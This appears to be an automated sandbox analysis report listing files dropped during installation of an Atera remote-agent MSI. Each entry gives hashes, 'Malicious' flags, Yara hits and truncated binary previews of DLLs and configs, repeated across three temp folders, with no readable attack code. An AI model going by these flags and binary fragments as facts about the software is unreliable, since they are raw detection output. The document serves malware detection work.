                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2E58.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2E58.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2E58.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI2E58.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI31B4.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI31B4.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI31B4.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI31B4.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI31B4.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI46E3.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI46E3.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI46E3.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI46E3.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
